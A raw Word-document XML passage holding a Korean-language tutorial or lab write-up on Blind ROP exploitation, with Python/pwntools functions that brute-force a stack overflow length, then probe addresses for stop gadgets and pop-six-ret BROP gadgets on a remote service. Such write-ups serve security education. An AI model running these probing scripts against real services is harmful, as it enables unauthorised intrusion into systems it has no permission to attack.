      </w:r>
      <w:r w:rsidR="002145E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>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3A2ABB58" w14:textId="77777777" w:rsidTr="002145E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0968B0A9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>def find_overflow():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="104DFA9F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for i in xrange(1, 0x1000):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A94543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476FB37F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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2345F019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send 'a' repeatedly increasing 1 to find overflow point</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D18A435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s.sendline('a'*i)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="456056C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data = s.recvuntil('game\n', timeout=1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BEDDBC0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if we got a EOFError, that's a overflow point, print and close the connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F1404D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0E0B1091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log.info('overflow length: {}'.format(i-1))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59873755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33629B9C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return i-1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50C895E1" w14:textId="206467EA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s.close()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="472F6DCD" w14:textId="77777777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2D346364" w14:textId="77777777" w:rsidR="000A7E3A" w:rsidRDefault="000A7E3A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1AB1AFE3" w14:textId="5C4070ED" w:rsidR="000A7E3A" w:rsidRDefault="000A7E3A" w:rsidP="000A7E3A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:left="1000" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Stop gadget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>찾기</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A04510D" w14:textId="4893004E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먼저,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여기서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>stop gadget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이란 프로그램의 시작점으로 다시 돌아갈 수 있는 주소를 뜻한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9AB019" w14:textId="55B13A03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가장 좋은 주소로는 리눅스의 경우 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>_start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 주소 혹은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>target function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 주소이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D849B9D" w14:textId="0D630004" w:rsidR="006B77A1" w:rsidRDefault="006B77A1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위 코드로 오버플로우 크기를 알아낸 이후 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>stop gadget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 찾아야한다.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오버플로우 크기를 알고 있다면 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>“A”*SIZE + CodeAddress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 페이로드로 넣어주어 공격했을 때 처음 출력값이 나오면 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>CodeAddress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 xml:space="preserve">STOP </w:t>
      </w:r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adget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 된다는 것을 이용하여 S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>TOP gadget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 찾을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296A7EA3" w14:textId="77777777" w:rsidTr="002145E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="408C489F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>def find_stop(over_len):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60CAC25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5D8E87D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if i%100 ==0:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FFEA6E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log.info('try.. {}'.format(i))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27553380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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AA57199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0803A1A0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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E5C1C9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</w:t>
            </w:r>
            <w:r w:rsidRPr="006B77A1">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">    # send a overflow data with return address overwrite</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EC19FCC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at this point, return address are increasing repeatedly same above based 0x400000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="651C583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s.sendline('a'*over_len+p64(base+i))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B71CAD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277F7A2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607E71D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log.info('data: {}'.format(data))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DE294C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if we got a 'password' in stdout, that means come back to the main</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2873902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if "password" in data:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="746E28F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log.info('stop gadget: {}'.format(hex(base+i)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41269526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0034B1B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return base+i</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00937ED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lastRenderedPageBreak/>
              <w:t xml:space="preserve">        # if we got a EOFError, that means connection is close without back to the main</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35750BF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515E4ADA" w14:textId="20CC4230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s.close()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BE82138" w14:textId="7D84B965" w:rsidR="002346CF" w:rsidRDefault="002346CF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346C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7C94A8E" wp14:editId="249E9493">
            <wp:extent cx="3848833" cy="2943225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B8F6540-F006-4736-A58E-6CE87E6622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DB8F6540-F006-4736-A58E-6CE87E6622D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77" cy="2944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9532E" w14:textId="77777777" w:rsidR="002346CF" w:rsidRDefault="002346CF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3B42DD13" w14:textId="77777777" w:rsidR="000A7E3A" w:rsidRDefault="000A7E3A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0C0598CB" w14:textId="7BD4D978" w:rsidR="000A7E3A" w:rsidRDefault="000A7E3A" w:rsidP="000A7E3A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:left="1000" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ROP Gadget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>찾기</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51785115" w14:textId="2112348A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여기서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>BROP Gadget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이란 p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>op*x;ret gadget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 뜻하며 R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">OP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">진행 과정에서 인자를 셋팅하기 위하여 필요한 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Gadget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 뜻한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B5A8C8" w14:textId="05C8F632" w:rsidR="006B77A1" w:rsidRDefault="006B77A1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S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>TOP Gadget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 찾았다면 B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ROP Gadget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>또한 찾아야한다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> BROP </w:t>
      </w:r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adget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 찾는 과정은</w:t>
      </w:r>
      <w:r w:rsidR="000A7E3A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A7E3A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="000A7E3A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="000A7E3A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">비트 인자를 </w:t>
      </w:r>
      <w:r w:rsidR="000A7E3A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="000A7E3A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">개 넣어준 후 뒤에 </w:t>
      </w:r>
      <w:r w:rsidR="000A7E3A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>stop gadget</w:t>
      </w:r>
      <w:r w:rsidR="000A7E3A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 넣어 b</w:t>
      </w:r>
      <w:r w:rsidR="000A7E3A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ase+I</w:t>
      </w:r>
      <w:r w:rsidR="000A7E3A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A7E3A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>gadget</w:t>
      </w:r>
      <w:r w:rsidR="000A7E3A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 실행됐을 때 m</w:t>
      </w:r>
      <w:r w:rsidR="000A7E3A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ain</w:t>
      </w:r>
      <w:r w:rsidR="000A7E3A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으로 다시 돌아온다면 b</w:t>
      </w:r>
      <w:r w:rsidR="000A7E3A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>rop gadget</w:t>
      </w:r>
      <w:r w:rsidR="000A7E3A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이라고 판단하였다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0999962A" w14:textId="2022BCCD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하지만 이 때,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>rop gadget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">pop;pop;pop;pop;pop;pop;ret </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가젯일 수도 있지만 p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>op;pop;pop;pop;pop;pop;imul;call;push;pop;ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>과 같은 가젯일 수 있기 떄문에 이를 정확하게 찾기 위하여 f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">ind_brop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함수를 따로 채용하였다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB1D9D0" w14:textId="25498859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6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">비트 인자를 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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">개 넣어 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>maybe brop gadget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 테스트하고,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6개의 인자를 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>pop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">한 후 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 한다면 오류가 날 것이기 때문에 이를 이용하여 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">pop;pop;pop;pop;pop;pop;ret </w:t>
      </w:r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adget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 찾도록 하였다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110075EF" w14:textId="0D57B8AB" w:rsidR="000A7E3A" w:rsidRDefault="000A7E3A" w:rsidP="000A7E3A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참고로 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">비트 프로그램에서는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">libc_csu_init </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">초기 루틴에 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">pop;pop;pop;pop;pop;pop;ret </w:t>
      </w:r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adget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이 존재하기 때문에 이를 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>routine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 구성하였다.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36A23C7C" w14:textId="77777777" w:rsidTr="002145E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FD43CC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>def find_maybe_brop(over_len, stop_gadget):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C2D037F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65EC117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if i%0x100 == 0:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C67565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log.info('try.. {}'.format(hex(i)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13689D2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2F61AE92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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5172E2D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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F76319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find pop*6 ret gadget</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="345970F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with six 64bit data and stop gadget, if base+i is pop*6, the binary come back to the main</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6650221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lastRenderedPageBreak/>
              <w:t xml:space="preserve">            pay = 'a'*over_len</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B382B6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pay += p64(base+i)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24E551C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pay += p64(0)*6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C80015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pay += p64(stop_gadget)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25C00E3F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53EF3DBC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s.sendline(pay)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C202DA4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data = s.recvuntil('password?\n', timeout=0.2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1983A5F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# if binary come to the main, base+i is two cases</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A83208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one is pop*6; imul; call ~~</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43843B3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two is pop*6; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42E10BE4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 xml:space="preserve">    # we want to base+i is two</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E92124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if 'password' in data:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54D40F9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log.info('maybe brop gadget: {}'.format(hex(base+i)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="666655D0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7EF6FD7A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gadget = find_brop(over_len, base+i)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64672741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if gadget:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6459E53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        return base+i</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67BB71C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1D09CB39" w14:textId="77777777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1BC605F4" w14:textId="77777777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16DF169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>def find_brop(over_len, addr):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07736EFD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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72758D3D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ab/>
              <w:t># when code without stop gadget, if binary got a EOFError, base+i is pop*?;ret gadget</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22B8593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15447193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lastRenderedPageBreak/>
              <w:t xml:space="preserve">        pay = 'a'*over_len</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DC5C3E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pay += p64(addr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26F97B44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pay += p64(0x41)*10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BFAAD6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s.sendline(pay)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ADB301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data = s.recvuntil('password?\n')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75D1D7B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data = s.recvuntil('password?\n')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E4DB28C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if 'password' in data:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55C74C58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59C8C19B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    return 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05B837E5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except EOFError:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="074504D7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log.info('find brop gadget: {}'.format(hex(addr)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DD76BDE" w14:textId="77777777" w:rsidR="002145E3" w:rsidRPr="006B77A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s.close()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BF950EC" w14:textId="03C67016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6B77A1">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
              </w:rPr>
